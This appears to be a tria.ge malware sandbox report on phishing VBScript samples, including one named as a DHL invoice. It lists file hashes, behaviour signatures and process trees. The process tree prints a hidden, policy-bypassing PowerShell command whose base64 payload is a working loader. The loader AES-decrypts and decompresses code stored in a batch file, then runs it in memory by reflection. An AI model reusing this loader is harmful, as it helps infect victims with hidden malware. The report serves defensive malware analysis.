Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1DHL-INVOIC...09.vbs
windows7-x64
8DHL-INVOIC...09.vbs
windows10-2004-x64
10Damage product 1.vbs
windows7-x64
8Damage product 1.vbs
windows10-2004-x64
10Damage product 2.vbs
windows7-x64
8Damage product 2.vbs
windows10-2004-x64
10Damage product 3.vbs
windows7-x64
8Damage product 3.vbs
windows10-2004-x64
10Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 05:37
Static task
static1
Behavioral task
behavioral1
Sample
DHL-INVOICE_10094519030720250009.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DHL-INVOICE_10094519030720250009.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Damage product 1.vbs
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Damage product 1.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
Damage product 2.vbs
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Damage product 2.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
Damage product 3.vbs
Resource
win7-20240903-en
General
-
Target
Damage product 3.vbs
-
Size
98KB
-
MD5
540e4bf8702b547df9e3868c10ac3af5
-
SHA1
e0e0ff304f3b373b285dc405f3eb44f03c2b989e
-
SHA256
de17c28e65d85e092109368925d9e27f51cb79c01cf4526011cfec863462e1af
-
SHA512
cbba98c3aa544380167e1a39d6232187c215a2432009666ad04db0d4fccba6c5f3dfc8d797b9916ab0fb4dcad149e54b899d00eb1268e99d442c34ce6e9d54a6
-
SSDEEP
3072:SMEJk61R5X/jMrkaQlPYvEIX3eUfiRwle2TfjH:p8/RaQ9wrXuUfi2TfjH
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2804 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2804 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2828 2736 WScript.exe 30 PID 2736 wrote to memory of 2828 2736 WScript.exe 30 PID 2736 wrote to memory of 2828 2736 WScript.exe 30 PID 2828 wrote to memory of 2980 2828 cmd.exe 32 PID 2828 wrote to memory of 2980 2828 cmd.exe 32 PID 2828 wrote to memory of 2980 2828 cmd.exe 32 PID 2980 wrote to memory of 2804 2980 cmd.exe 34 PID 2980 wrote to memory of 2804 2980 cmd.exe 34 PID 2980 wrote to memory of 2804 2980 cmd.exe 34 PID 2980 wrote to memory of 2804 2980 cmd.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Damage product 3.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskc2ducXIgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHNnbnFyKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRzZ25xciIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRzZ25xciwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkc2ducXIiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZHViY3MoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1JUa3FDdWhheVpHZDIrVGhkS21nUUNiV3k1T2QvbHUvL0dYNm1SVmdIcVk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2FYSDJzOWdqVDJMUHc3dm1NeGFGL0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gdHVjc3YoJHBhcmFtX3Zhcil7CSRkdmxncj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkZmN4aHA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkdnJ0b209TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZHZsZ3IsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHZydG9tLkNvcHlUbygkZmN4aHApOwkkdnJ0b20uRGlzcG9zZSgpOwkkZHZsZ3IuRGlzcG9zZSgpOwkkZmN4aHAuRGlzcG9zZSgpOwkkZmN4aHAuVG9BcnJheSgpO31mdW5jdGlvbiBzdmF3aCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHhyY2htPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGJjdndnPSR4cmNobS5FbnRyeVBvaW50OwkkYmN2d2cuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHNnbnFyOyRpYndycD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHNnbnFyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdGRlIGluICRpYndycCkgewlpZiAoJHRkZS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHdlbmh1PSR0ZGUuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHJ2dXRoPVtzdHJpbmdbXV0kd2VuaHUuU3BsaXQoJ1wnKTskanpuY3A9dHVjc3YgKGR1YmNzIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJ2dXRoWzBdKSkpOyRiamRxdz10dWNzdiAoZHViY3MgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcnZ1dGhbMV0pKSk7c3Zhd2ggJGp6bmNwICRudWxsO3N2YXdoICRiamRxdyAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
88KB
MD5256444260f4883588278d45371a49e19
SHA19037eecde41b28d23f45127b6cb59c40bf2e5124
SHA2564c2c6abf901520384cdb3b5c9074055fe49c9bd67df2da7a797745927f13a92a
SHA5129b0214afe7c9f76041210f2a39e1cdd58d4bdad4f8c59f091ad56343416adc06ad13870c1e03cb40cc71651353ab3776376bd7bc41bf1e8ac5e096afab053789